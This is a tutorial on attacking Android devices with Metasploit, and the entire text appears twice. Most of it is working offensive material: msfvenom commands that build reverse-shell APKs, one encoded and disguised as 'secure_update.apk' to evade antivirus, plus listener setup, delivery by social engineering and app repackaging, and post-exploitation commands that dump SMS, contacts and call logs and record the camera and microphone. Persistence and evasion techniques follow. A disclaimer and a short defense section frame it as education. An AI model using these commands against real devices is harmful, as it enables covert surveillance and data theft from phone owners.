================================================================================
DISCLAIMER
================================================================================
This article is intended for educational purposes and authorized security testing
only. All techniques described should only be performed on devices you own or have
explicit written permission to test. Unauthorized access to computer systems is
illegal under the Computer Fraud and Abuse Act (CFAA) and similar laws worldwide.
The authors and publishers assume no liability for misuse of this information.
================================================================================
TABLE OF CONTENTS
================================================================================
1. Introduction to Android Penetration Testing
2. Environment Setup (Kali Linux)
3. Metasploit Framework Overview
4. Creating Android Payloads with msfvenom
5. Setting Up the Listener
6. Exploitation Techniques
7. Post-Exploitation Modules
8. Persistence and Evasion
9. Detection and Mitigation
10. Legal and Ethical Considerations
11. References and Further Reading
================================================================================
1. INTRODUCTION TO ANDROID PENETRATION TESTING
================================================================================
Android penetration testing is a critical component of mobile application security
assessment. With over 3 billion active Android devices worldwide, understanding the
attack surface of Android ecosystems is essential for security professionals.
Key Objectives:
- Identify vulnerabilities in Android applications and systems
- Assess the security posture of mobile device configurations
- Evaluate the effectiveness of security controls
- Provide actionable remediation recommendations
Android Architecture Overview:
- Linux Kernel: Hardware abstraction layer
- Hardware Abstraction Layer (HAL): Interface between hardware and Android stack
- Android Runtime (ART): Application execution environment
- Native C/C++ Libraries: Core system libraries
- Java API Framework: Developer-facing APIs
- System Apps: Pre-installed applications
================================================================================
2. ENVIRONMENT SETUP (KALI LINUX)
================================================================================
Kali Linux is the industry-standard penetration testing distribution maintained by
Offensive Security. It comes pre-installed with hundreds of security tools including
Metasploit Framework.
System Requirements:
- Minimum 2GB RAM (4GB+ recommended)
- 20GB free disk space
- Virtualization support (VMware/VirtualBox) or bare metal installation
- Internet connection for updates
Initial Setup Commands:
# Update the system
sudo apt update && sudo apt full-upgrade -y
# Verify Metasploit installation
msfconsole --version
# Start PostgreSQL service (required for Metasploit database)
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Initialize Metasploit database
sudo msfdb init
# Verify network connectivity
ip addr show
ping -c 4 8.8.8.8
================================================================================
3. METASPLOIT FRAMEWORK OVERVIEW
================================================================================
Metasploit Framework (MSF) is an open-source penetration testing platform developed
by Rapid7. It provides a comprehensive environment for vulnerability exploitation,
post-exploitation, and security research.
Core Components:
- msfconsole: Interactive command-line interface
- msfvenom: Payload generation and encoding utility
- msfdb: Database management for storing scan results and credentials
- Meterpreter: Advanced payload with extensive post-exploitation capabilities
Key Terminology:
- Exploit: Code that takes advantage of a vulnerability
- Payload: Code executed on the target after successful exploitation
- Module: Self-contained piece of software within MSF
- Listener: Network service waiting for incoming connections from targets
================================================================================
4. CREATING ANDROID PAYLOADS WITH MSFVENOM
================================================================================
Msfvenom is the payload generation tool that replaced msfpayload and msfencode.
It supports multiple output formats and encoding options.
Basic Android Payload Generation:
# Standard reverse TCP payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=4444 -o /var/www/html/android_payload.apk
# With additional options for evasion
msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=4444 --platform android -a dalvik -e x86/shikata_ga_nai -i 5 -o /var/www/html/secure_update.apk
Payload Options Explained:
- -p: Specifies the payload module
- LHOST: Attacker's IP address (must be reachable by target)
- LPORT: Listening port for reverse connection
- -o: Output file path
- -e: Encoder to use (for AV evasion)
- -i: Number of encoding iterations
- -a: Architecture specification
Common Android Payloads:
1. android/meterpreter/reverse_tcp - Standard reverse shell
2. android/meterpreter/reverse_https - Encrypted reverse connection
3. android/meterpreter/reverse_http - HTTP-based reverse connection
4. android/shell/reverse_tcp - Basic command shell
================================================================================
5. SETTING UP THE LISTENER
================================================================================
The listener (handler) waits for the target device to connect back after executing
the payload.
Starting the Handler:
# Launch Metasploit console
msfconsole
# Use the exploit/multi/handler module
use exploit/multi/handler
# Set payload to match the generated payload
set payload android/meterpreter/reverse_tcp
# Configure connection parameters
set LHOST YOUR_IP_ADDRESS
set LPORT 4444
# Optional: Enable persistent handler
set ExitOnSession false
# Start listening
exploit -j -z
Handler Options:
- exploit -j: Run as background job
- exploit -z: Do not interact with session immediately
- jobs: List active background jobs
- sessions: List active sessions
================================================================================
6. EXPLOITATION TECHNIQUES
================================================================================
Method 1: Direct Installation (Requires Physical Access)
--------------------------------------------------------
1. Enable USB debugging on target device (Settings > Developer Options)
2. Connect via ADB: adb install android_payload.apk
3. Launch application manually or via: adb shell am start -n com.metasploit.stage/.MainActivity
Method 2: Social Engineering (Most Common)
------------------------------------------
1. Host the APK on a web server
2. Create convincing landing page or email
3. Use URL shorteners for obfuscation
4. Leverage social engineering to encourage installation
# Start simple HTTP server in payload directory
sudo python3 -m http.server 80
Method 3: Application Repackaging
---------------------------------
1. Decompile legitimate APK using apktool
2. Inject Meterpreter payload into the application
3. Recompile and sign the modified APK
4. Distribute through unofficial channels
# Decompile legitimate app
apktool d legitimate_app.apk -o app_folder
# Inject payload (manual process requiring Smali knowledge)
# ... modify Smali code to include payload invocation ...
# Recompile
apktool b app_folder -o modified_app.apk
# Sign APK
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore modified_app.apk alias_name
================================================================================
7. POST-EXPLOITATION MODULES
================================================================================
Once a Meterpreter session is established, numerous post-exploitation modules
are available for Android targets.
Session Management:
# List active sessions
sessions
# Interact with specific session
sessions -i 1
# Background current session
background
Core Android Commands:
# Gather system information
sysinfo
# List running processes
ps
# Dump call logs
dump_calllog
# Extract SMS messages
dump_sms
n
# Access contact list
dump_contacts
# Geolocation tracking
geolocate
# Webcam control
webcam_list
webcam_snap
# Microphone recording
record_mic -d 10
# File system operations
ls
cd /sdcard
download file.txt /local/path/
upload /local/file.txt /remote/path/
# Interact with device shell
shell
Advanced Post-Exploitation:
# Install additional applications
install /path/to/app.apk
# Send SMS messages
send_sms -d +1234567890 -t "Test message"
# Check root access
check_root
# Attempt privilege escalation
exploit/local/android/local_exploit_suggestor
================================================================================
8. PERSISTENCE AND EVASION
================================================================================
Maintaining access and avoiding detection are critical aspects of red team
operations.
Persistence Techniques:
1. Boot Receiver Registration
- Register broadcast receiver for BOOT_COMPLETED action
- Automatically restart payload on device reboot
2. Service Binding
- Bind payload to legitimate system service
- Restart when parent service restarts
3. Scheduled Tasks
- Use AlarmManager for periodic execution
- Set intervals to avoid battery drain detection
Evasion Techniques:
1. Payload Obfuscation
- Use ProGuard or custom obfuscation
- Encrypt strings and method names
2. Certificate Pinning Bypass
- Hook SSL verification methods
- Use Frida or Xposed frameworks
3. Anti-Analysis Techniques
- Check for emulator indicators
- Detect debugging attachments
- Verify installer source
4. Network Evasion
- Use HTTPS payloads to blend with normal traffic
- Implement domain fronting techniques
- Leverage DNS tunneling for C2
================================================================================
9. DETECTION AND MITIGATION
================================================================================
Defensive measures to protect Android devices from Metasploit-based attacks.
Detection Methods:
1. Network Monitoring
- Monitor for unusual outbound connections
- Detect beaconing patterns
- Analyze DNS query anomalies
2. Host-Based Detection
- Monitor for unknown APK installations
- Detect privilege escalation attempts
- Track abnormal battery consumption
3. Application Analysis
- Static analysis of APK files
- Dynamic behavior monitoring
- Permission usage analysis
Mitigation Strategies:
1. Device Hardening
- Disable "Install from Unknown Sources"
- Keep OS and applications updated
- Use device management policies
2. Application Security
- Implement certificate pinning
- Use runtime application self-protection (RASP)
- Encrypt sensitive data at rest
3. Network Security
- Implement mobile device management (MDM)
- Use VPN for corporate data access
- Deploy network access control (NAC)
4. User Education
- Phishing awareness training
- Safe browsing practices
- Report suspicious applications
================================================================================
10. LEGAL AND ETHICAL CONSIDERATIONS
================================================================================
Authorization Requirements:
- Written permission from device owner
- Defined scope of testing
- Time-bound engagement parameters
- Data handling agreements
Regulatory Compliance:
- GDPR (European Union data protection)
- CCPA (California Consumer Privacy Act)
- Local computer crime statutes
- Industry-specific regulations (HIPAA, PCI-DSS)
Responsible Disclosure:
- Report findings to affected parties
- Allow reasonable remediation time
- Coordinate public disclosure
- Avoid causing unnecessary harm
Professional Ethics:
- Do no harm principle
- Respect privacy expectations
- Maintain confidentiality
- Act in client's best interest
================================================================================
11. REFERENCES AND FURTHER READING
================================================================================
Official Resources:
- Metasploit Framework Documentation: https://docs.metasploit.com/
- Kali Linux Documentation: https://www.kali.org/docs/
- Android Security Documentation: https://source.android.com/security
Books:
- "Metasploit: The Penetration Tester's Guide" by David Kennedy
- "The Hacker Playbook" by Peter Kim
- "Android Security Internals" by Nikolay Elenkov
Research Papers:
- "An Analysis of Android Malware Detection Techniques" - IEEE S&P
- "Mobile Application Security: A Survey" - ACM Computing Surveys
Community Resources:
- Offensive Security Training: https://www.offensive-security.com/
- OWASP Mobile Security Project: https://owasp.org/www-project-mobile-security/
- Android Security Bulletins: https://source.android.com/security/bulletin
================================================================================
CONCLUSION
================================================================================
Android penetration testing with Metasploit Framework provides security professionals
with powerful capabilities for assessing mobile security posture. However, these
tools must be used responsibly and ethically, with proper authorization and within
legal boundaries.
The landscape of mobile security continues to evolve, with Android implementing
progressive security features including Google Play Protect, SafetyNet, and enhanced
sandboxing. Security professionals must stay current with both offensive and defensive
techniques to effectively protect mobile ecosystems.
Remember: With great power comes great responsibility. Always obtain proper
authorization before conducting security assessments and prioritize the security
and privacy of end users.
DISCLAIMER
================================================================================
This article is intended for educational purposes and authorized security testing
only. All techniques described should only be performed on devices you own or have
explicit written permission to test. Unauthorized access to computer systems is
illegal under the Computer Fraud and Abuse Act (CFAA) and similar laws worldwide.
The authors and publishers assume no liability for misuse of this information.
================================================================================
TABLE OF CONTENTS
================================================================================
1. Introduction to Android Penetration Testing
2. Environment Setup (Kali Linux)
3. Metasploit Framework Overview
4. Creating Android Payloads with msfvenom
5. Setting Up the Listener
6. Exploitation Techniques
7. Post-Exploitation Modules
8. Persistence and Evasion
9. Detection and Mitigation
10. Legal and Ethical Considerations
11. References and Further Reading
================================================================================
1. INTRODUCTION TO ANDROID PENETRATION TESTING
================================================================================
Android penetration testing is a critical component of mobile application security
assessment. With over 3 billion active Android devices worldwide, understanding the
attack surface of Android ecosystems is essential for security professionals.
Key Objectives:
- Identify vulnerabilities in Android applications and systems
- Assess the security posture of mobile device configurations
- Evaluate the effectiveness of security controls
- Provide actionable remediation recommendations
Android Architecture Overview:
- Linux Kernel: Hardware abstraction layer
- Hardware Abstraction Layer (HAL): Interface between hardware and Android stack
- Android Runtime (ART): Application execution environment
- Native C/C++ Libraries: Core system libraries
- Java API Framework: Developer-facing APIs
- System Apps: Pre-installed applications
================================================================================
2. ENVIRONMENT SETUP (KALI LINUX)
================================================================================
Kali Linux is the industry-standard penetration testing distribution maintained by
Offensive Security. It comes pre-installed with hundreds of security tools including
Metasploit Framework.
System Requirements:
- Minimum 2GB RAM (4GB+ recommended)
- 20GB free disk space
- Virtualization support (VMware/VirtualBox) or bare metal installation
- Internet connection for updates
Initial Setup Commands:
# Update the system
sudo apt update && sudo apt full-upgrade -y
# Verify Metasploit installation
msfconsole --version
# Start PostgreSQL service (required for Metasploit database)
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Initialize Metasploit database
sudo msfdb init
# Verify network connectivity
ip addr show
ping -c 4 8.8.8.8
================================================================================
3. METASPLOIT FRAMEWORK OVERVIEW
================================================================================
Metasploit Framework (MSF) is an open-source penetration testing platform developed
by Rapid7. It provides a comprehensive environment for vulnerability exploitation,
post-exploitation, and security research.
Core Components:
- msfconsole: Interactive command-line interface
- msfvenom: Payload generation and encoding utility
- msfdb: Database management for storing scan results and credentials
- Meterpreter: Advanced payload with extensive post-exploitation capabilities
Key Terminology:
- Exploit: Code that takes advantage of a vulnerability
- Payload: Code executed on the target after successful exploitation
- Module: Self-contained piece of software within MSF
- Listener: Network service waiting for incoming connections from targets
================================================================================
4. CREATING ANDROID PAYLOADS WITH MSFVENOM
================================================================================
Msfvenom is the payload generation tool that replaced msfpayload and msfencode.
It supports multiple output formats and encoding options.
Basic Android Payload Generation:
# Standard reverse TCP payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=4444 -o /var/www/html/android_payload.apk
# With additional options for evasion
msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=4444 --platform android -a dalvik -e x86/shikata_ga_nai -i 5 -o /var/www/html/secure_update.apk
Payload Options Explained:
- -p: Specifies the payload module
- LHOST: Attacker's IP address (must be reachable by target)
- LPORT: Listening port for reverse connection
- -o: Output file path
- -e: Encoder to use (for AV evasion)
- -i: Number of encoding iterations
- -a: Architecture specification
Common Android Payloads:
1. android/meterpreter/reverse_tcp - Standard reverse shell
2. android/meterpreter/reverse_https - Encrypted reverse connection
3. android/meterpreter/reverse_http - HTTP-based reverse connection
4. android/shell/reverse_tcp - Basic command shell
================================================================================
5. SETTING UP THE LISTENER
================================================================================
The listener (handler) waits for the target device to connect back after executing
the payload.
Starting the Handler:
# Launch Metasploit console
msfconsole
# Use the exploit/multi/handler module
use exploit/multi/handler
# Set payload to match the generated payload
set payload android/meterpreter/reverse_tcp
# Configure connection parameters
set LHOST YOUR_IP_ADDRESS
set LPORT 4444
# Optional: Enable persistent handler
set ExitOnSession false
# Start listening
exploit -j -z
Handler Options:
- exploit -j: Run as background job
- exploit -z: Do not interact with session immediately
- jobs: List active background jobs
- sessions: List active sessions
================================================================================
6. EXPLOITATION TECHNIQUES
================================================================================
Method 1: Direct Installation (Requires Physical Access)
--------------------------------------------------------
1. Enable USB debugging on target device (Settings > Developer Options)
2. Connect via ADB: adb install android_payload.apk
3. Launch application manually or via: adb shell am start -n com.metasploit.stage/.MainActivity
Method 2: Social Engineering (Most Common)
------------------------------------------
1. Host the APK on a web server
2. Create convincing landing page or email
3. Use URL shorteners for obfuscation
4. Leverage social engineering to encourage installation
# Start simple HTTP server in payload directory
sudo python3 -m http.server 80
Method 3: Application Repackaging
---------------------------------
1. Decompile legitimate APK using apktool
2. Inject Meterpreter payload into the application
3. Recompile and sign the modified APK
4. Distribute through unofficial channels
# Decompile legitimate app
apktool d legitimate_app.apk -o app_folder
# Inject payload (manual process requiring Smali knowledge)
# ... modify Smali code to include payload invocation ...
# Recompile
apktool b app_folder -o modified_app.apk
# Sign APK
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore modified_app.apk alias_name
================================================================================
7. POST-EXPLOITATION MODULES
================================================================================
Once a Meterpreter session is established, numerous post-exploitation modules
are available for Android targets.
Session Management:
# List active sessions
sessions
# Interact with specific session
sessions -i 1
# Background current session
background
Core Android Commands:
# Gather system information
sysinfo
# List running processes
ps
# Dump call logs
dump_calllog
# Extract SMS messages
dump_sms
n
# Access contact list
dump_contacts
# Geolocation tracking
geolocate
# Webcam control
webcam_list
webcam_snap
# Microphone recording
record_mic -d 10
# File system operations
ls
cd /sdcard
download file.txt /local/path/
upload /local/file.txt /remote/path/
# Interact with device shell
shell
Advanced Post-Exploitation:
# Install additional applications
install /path/to/app.apk
# Send SMS messages
send_sms -d +1234567890 -t "Test message"
# Check root access
check_root
# Attempt privilege escalation
exploit/local/android/local_exploit_suggestor
================================================================================
8. PERSISTENCE AND EVASION
================================================================================
Maintaining access and avoiding detection are critical aspects of red team
operations.
Persistence Techniques:
1. Boot Receiver Registration
- Register broadcast receiver for BOOT_COMPLETED action
- Automatically restart payload on device reboot
2. Service Binding
- Bind payload to legitimate system service
- Restart when parent service restarts
3. Scheduled Tasks
- Use AlarmManager for periodic execution
- Set intervals to avoid battery drain detection
Evasion Techniques:
1. Payload Obfuscation
- Use ProGuard or custom obfuscation
- Encrypt strings and method names
2. Certificate Pinning Bypass
- Hook SSL verification methods
- Use Frida or Xposed frameworks
3. Anti-Analysis Techniques
- Check for emulator indicators
- Detect debugging attachments
- Verify installer source
4. Network Evasion
- Use HTTPS payloads to blend with normal traffic
- Implement domain fronting techniques
- Leverage DNS tunneling for C2
================================================================================
9. DETECTION AND MITIGATION
================================================================================
Defensive measures to protect Android devices from Metasploit-based attacks.
Detection Methods:
1. Network Monitoring
- Monitor for unusual outbound connections
- Detect beaconing patterns
- Analyze DNS query anomalies
2. Host-Based Detection
- Monitor for unknown APK installations
- Detect privilege escalation attempts
- Track abnormal battery consumption
3. Application Analysis
- Static analysis of APK files
- Dynamic behavior monitoring
- Permission usage analysis
Mitigation Strategies:
1. Device Hardening
- Disable "Install from Unknown Sources"
- Keep OS and applications updated
- Use device management policies
2. Application Security
- Implement certificate pinning
- Use runtime application self-protection (RASP)
- Encrypt sensitive data at rest
3. Network Security
- Implement mobile device management (MDM)
- Use VPN for corporate data access
- Deploy network access control (NAC)
4. User Education
- Phishing awareness training
- Safe browsing practices
- Report suspicious applications
================================================================================
10. LEGAL AND ETHICAL CONSIDERATIONS
================================================================================
Authorization Requirements:
- Written permission from device owner
- Defined scope of testing
- Time-bound engagement parameters
- Data handling agreements
Regulatory Compliance:
- GDPR (European Union data protection)
- CCPA (California Consumer Privacy Act)
- Local computer crime statutes
- Industry-specific regulations (HIPAA, PCI-DSS)
Responsible Disclosure:
- Report findings to affected parties
- Allow reasonable remediation time
- Coordinate public disclosure
- Avoid causing unnecessary harm
Professional Ethics:
- Do no harm principle
- Respect privacy expectations
- Maintain confidentiality
- Act in client's best interest
================================================================================
11. REFERENCES AND FURTHER READING
================================================================================
Official Resources:
- Metasploit Framework Documentation: https://docs.metasploit.com/
- Kali Linux Documentation: https://www.kali.org/docs/
- Android Security Documentation: https://source.android.com/security
Books:
- "Metasploit: The Penetration Tester's Guide" by David Kennedy
- "The Hacker Playbook" by Peter Kim
- "Android Security Internals" by Nikolay Elenkov
Research Papers:
- "An Analysis of Android Malware Detection Techniques" - IEEE S&P
- "Mobile Application Security: A Survey" - ACM Computing Surveys
Community Resources:
- Offensive Security Training: https://www.offensive-security.com/
- OWASP Mobile Security Project: https://owasp.org/www-project-mobile-security/
- Android Security Bulletins: https://source.android.com/security/bulletin
================================================================================
CONCLUSION
================================================================================
Android penetration testing with Metasploit Framework provides security professionals
with powerful capabilities for assessing mobile security posture. However, these
tools must be used responsibly and ethically, with proper authorization and within
legal boundaries.
The landscape of mobile security continues to evolve, with Android implementing
progressive security features including Google Play Protect, SafetyNet, and enhanced
sandboxing. Security professionals must stay current with both offensive and defensive
techniques to effectively protect mobile ecosystems.
Remember: With great power comes great responsibility. Always obtain proper
authorization before conducting security assessments and prioritize the security
and privacy of end users.